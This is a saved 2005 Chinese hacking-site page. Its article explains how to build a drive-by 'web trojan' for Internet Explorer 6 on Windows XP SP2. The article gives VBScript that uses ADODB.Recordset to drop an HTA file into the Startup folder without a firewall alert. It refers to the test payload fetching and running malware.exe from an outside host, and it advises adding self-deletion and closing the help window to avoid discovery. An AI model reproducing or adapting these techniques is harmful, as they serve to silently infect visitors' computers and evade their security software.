📄 20053302254.htm
字号:
<HTML><HEAD><TITLE>Windows XP SP2网页木马制作思路分析-http://www.koyee.com</TITLE>
<SCRIPT src="../../ips.asp"></SCRIPT>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META http-equiv=http://www.koyee.com content=no-cache>
<META content=可以网络在线,ASP技术,.NET技术,delphi技术,JSP技术,VB技术! name=KEYWORDS>
<STYLE type=text/css>
BODY {
BACKGROUND-IMAGE: url(images/webtop_bg3.gif); MARGIN: 0px
}
.style2 {
FONT-SIZE: 12px
}
BODY {
FONT-SIZE: 12px;
COLOR: #333333;
background-image: url();
}
TD {
FONT-SIZE: 12px; COLOR: #333333
}
TH {
FONT-SIZE: 12px; COLOR: #333333
}
A:link {
COLOR: #333333; LINE-HEIGHT: normal; FONT-STYLE: normal; FONT-FAMILY: "宋体"; TEXT-DECORATION: none
}
A:visited {
COLOR: #cc3399; FONT-STYLE: normal; FONT-FAMILY: "宋体"; TEXT-DECORATION: none
}
A:hover {
COLOR: #cc66ff; FONT-STYLE: normal; FONT-FAMILY: "宋体"; TEXT-DECORATION: none
}
A:active {
COLOR: #ff9999; FONT-STYLE: normal; FONT-FAMILY: "宋体"; TEXT-DECORATION: none
}
.style4 {color: #FFFFFF}
.style5 {color: #000000}
.style6 {color: #FF0000}
.style7 {
color: #FF0000;
font-size: 16px;
font-weight: bold;
}
</STYLE></head>
<script language="JavaScript">
var timerID = null;
var timerRunning = false;
function stopclock (){
if(timerRunning)
clearTimeout(timerID);
timerRunning = false;}
function startclock () {
stopclock();
showtime();}
function showtime () {
var now = new Date();
var year = now.getYear();
var month = now.getMonth()+1;
var day = now.getDate();
var hours = now.getHours();
var minutes = now.getMinutes();
var seconds = now.getSeconds()
var timeValue =year +"年"
timeValue += month+"月"
timeValue += day+"日 "
timeValue += "" +((hours >= 12) ? "下午 " : "上午 " )
timeValue += ((hours >12) ? hours -12 :hours)
timeValue += ((minutes < 10) ? ":0" : ":") + minutes
timeValue += ((seconds < 10) ? ":0" : ":") + seconds
liveclock.innerHTML=timeValue
timerID = setTimeout("showtime()",1000);
timerRunning = true;}
</script>
<body onload="startclock()">
<TABLE height=60 cellSpacing=0 cellPadding=0 width="800"
align=center border=0>
<TBODY>
<TR>
<td background="../../images/webtop_bg.gif" width="332"><a target=blank href=http://wpa.qq.com/msgrd?V=1&Uin=61637663&Site=http://www.koyee.com&Menu=yes><img border="0" SRC=http://wpa.qq.com/pa?p=1:61637663:13 alt="有事就给我打电话,拼命的打"></a></td>
<td background="../../images/webtop_bg.gif" width="455"><script src="http://www.4.ads99.net/banner.php?userid=chdujian"></script></td>
</TR></TBODY></TABLE>
<TABLE height=25 cellSpacing=0 cellPadding=0 width="800"
align=center border=0>
<TBODY>
<TR>
<td background="../../images/22.gif"> <a href=../../index.htm>首页</a> | <a href=../../artical/69/1.htm>程序设计</a> | <a href=../../artical/77/1.htm>IT行情</a> | <a href=../../artical/78/1.htm>黑客攻防</a> | <a href=../../artical/79/1.htm>电脑硬件</a></td>
</TR></TBODY></TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td scope="col"><img src="http://www.asp315.com/study/images/index_r1_c1.jpg" width="800" height="83"></td>
</tr>
</table>
<TABLE height=25 cellSpacing=0 cellPadding=0 width="800"
align=center border=0>
<TBODY>
<TR>
<td width="624" bgcolor="#CCCCCC">当前位置:<a href=../../index.htm>首页</a>--><a href=../../artical/78/1.htm>黑客攻防</a>--><a href=../../artical/98/1.htm>黑客编程</a>-->显示文章内容</td><td width="176" bgcolor="#CCCCCC"><span id="liveclock"></span></td>
</TR></TBODY></TABLE>
<table width="800" height="406" border="1" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td width="166" height="200" valign="top" scope="col"><table width="100%" height="163" border="0" cellpadding="0" cellspacing="0">
<tr>
<td height="119" valign="top" scope="col"><table width="180" border="0" cellspacing="0" cellpadding="0" align="center">
<form action="../../search.asp" method="post" name="searchLeftForm">
<tr bgcolor="CAF6F4" align="center">
<td height="25" bgcolor="#CC9900"><font color="#cc0000"><b>□
站 内 搜 索 □</b></font></td>
</tr>
<tr align="center">
<td style="line-height:150%" height=60> 请输入查询的字符串:<br>
<input name="search" type="text" class="button1" id="search" style="width:150">
<select name="seaguan" size="1" class="button1" id="seaguan" style="width:150">
<option value="">==> 综合查询 <==</option>
<option value="title">标题</option>
<option value="冰狐浪子">作者</option>
<option value="artical">内容</option>
<%call getNewsBoardTree()%>
</select>
</td>
</tr>
<tr align="center">
<td>
<input type="SUBMIT" name="Action" value=" 查 询 " class="button2">
<input type="RESET" name="Clear" value=" 重 写 " class="button2">
</td>
</tr>
<tr align="center">
<td height="10"></td>
</tr>
</form>
</table></td>
</tr>
<tr>
<td height="20"><table width="181" height="20" cellpadding="0" cellspacing="0">
<tr><td width="181" height="20" align="center" bgcolor="#CC9900">分类最新文章</td>
</tr>
<tr><td><a href=20054282302.htm target=_blank>ffffffffffffff</a></td></tr><tr><td><a href=20054123551.htm target=_blank>使用C语言编写提取通用she</a></td></tr><tr><td><a href=200541232242.htm target=_blank>抛砖引玉之自己动手学写脚本</a></td></tr><tr><td><a href=20053302254.htm target=_blank>Windows XP SP2</a></td></tr>
</table></td>
</tr>
<tr>
<td height="20"><table width="181" height="20" cellpadding="0" cellspacing="0">
<tr><td width="181" height="20" align="center" bgcolor="#CC9900">分类热门文章</td>
</tr>
<tr><td><a href=20053302254.htm target=_blank>Windows XP SP2</a></td></tr><tr><td><a href=20054123551.htm target=_blank>使用C语言编写提取通用she</a></td></tr><tr><td><a href=20054282302.htm target=_blank>ffffffffffffff</a></td></tr><tr><td><a href=200541232242.htm target=_blank>抛砖引玉之自己动手学写脚本</a></td></tr>
</table></td>
</tr>
</table></td>
<td width="628" valign="top" scope="col"><table width="100%" border="0" align="center" cellspacing="0" cellpadding="5" bordercolordark="#FFFFFF" bordercolorlight="#000000" style="word-break:break-all;">
<tr>
<td width="100%">
</td>
</tr>
<tr>
<td width="100%">
<div align="center">
<p class="style7"><SPAN class=style1>Windows XP SP2网页木马制作思路分析</SPAN></p>
<hr size="1" color="#0a778b" width="100%">
发布时间:2005-3-30 被阅览数:<SCRIPT src="../../counter.asp?id=477"></SCRIPT> 次 作者:冰狐浪子
</div>
</td>
</tr>
<tr>
<td width="100%"><p class="style6">利用漏洞:<BR>Microsoft Internet Explorer SP2远程任意命令执行漏洞<BR><BR>发布日期:2004-12-23<BR><BR>受影响系统:<BR>Microsoft Internet Explorer 6.0SP2<BR> - Microsoft Windows XP Professional SP2 <BR> - Microsoft Windows XP Home SP2<BR><BR>Microsoft Internet Explorer结合多种漏洞如Help ActiveX控件等问题,远程攻击者可以利用这个漏洞无需用户交互来执行任意文件而导致恶<BR><BR>意代码执行.<BR><BR>详见:<A href="http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7272&keyword=">绿盟<BR></A><BR> 冰狐浪子的个人测试及分析<BR><BR> 因为所公布的测试页面是用于英文版本的winxp系统,所以用中文系统测试前,要先建立如下目录<BR><BR>C:\Documents and Settings\All Users\Start Menu\Programs\Startup\<BR><BR>我利用所给的测试页面进行测试,发现如果装有防火墙,会提示应用程序alg.exe访问网络,选择允许后,察看C:\Documents and Settings\All <BR><BR>Users\Start Menu\Programs\Startup\目录发现被写入一文件"Microsoft Office.hta",运行"Microsoft Office.hta",发现自动从<BR><BR>http://freehost07.websamba.com/greyhats/malware.exe下载并运行了一个精美的火焰DEMO,C盘根目录下面出现malware.exe程序[需要说明的<BR><BR>是运行Microsoft Office.hta时防火墙并没有报警]!<BR> 我察看代码后发现防火墙报警的原因为writehta.txt里的代码是通过访问远程数据库来获得要写入Microsoft Office.hta里的代码的,如果<BR><BR>我们不访问数据库而直接把hta的代码写到脚本里,就可以不引起防火墙的报警啦!呵呵<BR>方法是调用ADODB.Recordset,把用到的代码写为一条记录,我也是在网上找到的代码代码如下:<BR><BR>on error resume next<BR>set evanchik = CreateObject("ADODB.Recordset")<BR> With evanchik<BR> .Fields.Append "evanchik", 200, "3000"<BR> Call .Open<BR> Call .AddNew<BR> .Fields("evanchik").Value = "meaning less shit i had to put here"<BR> Call .AddNew<BR> .Fields("evanchik").Value = "此处写上要写到启动目录里的具体代码"<BR> Call .Update<BR> End With<BR>evanchik.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML<BR>evanchik.Close<BR><BR>解决了防火墙问题,接下来就要看如何隐蔽开机后hta文件的运行啦,具体我就不写啦,请参照网上以前object漏洞的利用代码,也就是现在网上所<BR><BR>谓的"不闪的网页木马"!需要注意一点,hta最好加上自动删除功能,这样就运行一次后不会被后来轻易发现!<BR><BR>另外这个漏洞做的网页木马会打开一帮助文件,如果你觉得不太好的话,可以利用帮助控件里的<PARAM name="Command" value="Close" /><BR>Close参数进行自动关闭!<BR>至此一个XPsp2的网页木马顺利完工!<BR><BR>不足之处:<BR>1.因为我没找到可以直接自动运行的方法,只有写到启动文件夹里,等机器重新启动后运行hta文件,容易被发现后清除,使得木马无法被下载运行<BR>2.因为要调用本地的htm或chm文件,获得写文件权限,所以当系统不是默认安装在C盘下时,无法写入文件!<BR><BR>最后,祝愿大家新年万事如意,每天有个好心情!祝我的GG朋友们找个PPMM.</p>
<p><img src="http://www.koyee.com/images/dgg.gif" height="70" width="587"> </p></td>
</tr>
<tr>
<td width="628" bordercolor="0" class="font1"><p>
<hr size="1" color="#0a778b" width="100%">
<table><tr><td width="269" align="center">上一篇: <a href=../96/20053301583.htm title=韩国黑客攻击五个日本官方网站>韩国黑客攻击五个日本官方网站</a> </td>
<td width="285" align="center">下一篇: <a href=../90/200542823048.htm title=gew>gew</a></td>
</tr></table>
<hr size="1" color="#0a778b" width="100%">
<div align="right"> <a href="javascript:window.print()"><img src="../../images/printer.gif" width="16" height="14" border="0" align="absmiddle">打印本页</a> | <a href="javascript:window.close()"><img src="../../images/close.gif" width="14" height="14" border="0" align="absmiddle">关闭窗口</a> </div>
<p></p></td>
</tr>
</table></td>
</tr>
</table>
<TABLE height=62 cellSpacing=0 cellPadding=0 width="800"
align=center background=../../images/webtop_bg.gif
border=0>
<TBODY>
<TR>
<TD><div align="center" class="style4">Copyright @ 2004-2008 http://www.koyee.com 可以网络在线版权所有<br>
公司地址:江西南昌 电话:13879173467 邮编:330029<br>
email:chenxueyan9999@163.com</div></TD>
</TR></TBODY></TABLE>
</BODY></HTML>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -